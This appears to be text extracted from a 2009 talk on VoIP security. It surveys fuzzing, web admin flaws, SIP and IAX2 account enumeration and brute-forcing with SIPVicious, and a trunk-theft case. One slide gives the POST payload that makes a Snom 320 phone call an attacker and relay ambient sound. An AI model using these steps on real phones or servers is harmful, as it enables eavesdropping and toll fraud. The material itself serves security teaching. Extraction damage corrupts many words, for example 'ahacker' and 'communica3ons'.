11. VoIP: A hackers dream
• Integrates the voice communica3ons of an
organisa3on into an environment the ahacker
is familiar with
• Same protocols, tools and environments
• Open standards and accessible devices
• Scary as hell when you think about it – you
just moved your en3re comms infrastructure
to our playground
• Cheers!
VoIP Security ‐ Implementa3on and
5th May 2009 11
Protocol Problems
13. Good ol’ memory corrup3on
Servers running on Windows, Linux or other
Unix
+ Phones running on a tradi3onal OS or oNen
embedded Linux
+ Wrihen in C/C++
= Buffer overflows, NULL pointers, infinite loops
and all their friends
VoIP Security ‐ Implementa3on and
5th May 2009 13
Protocol Problems
14. Finding the bugs
• Fuzzing ‐ a rather effec3ve hammer for many a
nail
• Automa3cally genera3on/sending semi‐valid
requests to a target in the hope of crashing it
• Requires no understanding of the applica3on/
device internals
• Responsibly for the detec3on of a huge
percentage of security bugs
VoIP Security ‐ Implementa3on and
5th May 2009 14
Protocol Problems
18. Building your own fuzzer
• Genera3onal fuzzing frameworks available –
Peach, Sulley, Fusil, Spike etc
• Map out the protocol in a high level
descrip3on language
• Auxiliary tools for crash detec3on and logging
VoIP Security ‐ Implementa3on and
5th May 2009 18
Protocol Problems
24. Web service ahacks
• Most hard‐phones provide a web based admin
interface, as do many servers
• Notoriously security agnos3c
• XSS, CSRF, SQL injec3on, default/no passwords,
authen3ca3on bypass
“Cisco Unified Communica7ons Manager is vulnerable to
a SQL Injec7on aBack in the parameter key of the
admin and user interface pages. A successful aBack
could allow an authen7cated aBacker to access
informa7on such as usernames and password hashes
that are stored in the database.” – Cisco 2008
VoIP Security ‐ Implementa3on and
5th May 2009 24
Protocol Problems
26. GNUCi3zen.org – Snom 320 ahack
• Ahacker scans for vulnerable devices by
checking for remotely accessible signature
files
• Ahacker sends POST to vic3m’s IP with data:
NUMBER=ATTACKERNUM
• Ahacker answers the incoming call
• Vulnerable device uses inbuilt receiver to
capture ambient sound and send to the
ahacker
VoIP Security ‐ Implementa3on and
5th May 2009 26
Protocol Problems
30. Ahacking the protocols ‐ discovery
• Many VoIP protocols are TCP based and run on
standard ports – nmap
• Specialist tools available for certain protocols
– SIPVicious, iaxscan – Can scan thousands of
hosts an hour
• Scanning random hosts turns up hoards of
easily accessible servers
VoIP Security ‐ Implementa3on and
5th May 2009 30
Protocol Problems
31. Ahacking the protocols ‐
authen3ca3on
• SIP and IAX2 – 2 step authen3ca3on by default
• What does that mean? – We can enumerate valid
accounts first and then crack passwords
• Account discovery search space
– Two step auth = X*X
– Single step auth = XX
Where X is the size of the username/password pool
• We’d shoot a web developer that did this but
apparently it’s OK for VoIP
VoIP Security ‐ Implementa3on and
5th May 2009 31
Protocol Problems
32. Ahacking the protocols ‐
authen3ca3on
• Many networks s3ll use 3 or 4 digit usernames
and passwords
• SIPVicious/iaxscan can check all possible
combina3ons in minutes
VoIP Security ‐ Implementa3on and
5th May 2009 32
Protocol Problems
34. Taking the trunk
• Stealing individual accounts is fun and all but
how about stealing the phone company?
• Requires admin access to an accessible router
or switch
• How?
• Straight through the front door
VoIP Security ‐ Implementa3on and
5th May 2009 34
Protocol Problems
35. Taking the trunk
• Robert Moore – 2007, stole 10 million minutes
worth of talk 3me
• Step 1: Bought informa3on on corporate IP
addresses for $800
• Step 2: Scanned for accessible VoIP routers and
switches
• Step 3: Scanned for default passwords and
unpatched Cisco boxes
• Step 4: Profit! (Or jail in Mr. Moore’s case)
VoIP Security ‐ Implementa3on and
5th May 2009 35
Protocol Problems
36. Taking the trunk
• “70% of all the companies he scanned were
insecure, and 45% to 50% of VoIP providers were
insecure”
• “I'd say 85% of them were misconfigured routers.
They had the default passwords on themquot;
• “The telecoms we couldn't get into had access
lists or boxes we couldn't get into because of
strong passwords.”
‐ Source: http://www.informationweek.com
VoIP Security ‐ Implementa3on and
5th May 2009 36
Protocol Problems
37. Ahacking the protocols ‐ summary
• Essen3ally the same offence/defence we’ve
had for years
• Discovery, enumera3on and exploita3on
follow roughly the same paherns as most
other TCP/IP services
• Protec3ng against these problems is the same
struggle with password management, access
lists and updates
VoIP Security ‐ Implementa3on and
5th May 2009 37
Protocol Problems
38. Ques3on Time!
http://seanhn.wordpress.com
VoIP Security ‐ Implementa3on and
5th May 2009 38
Protocol Problems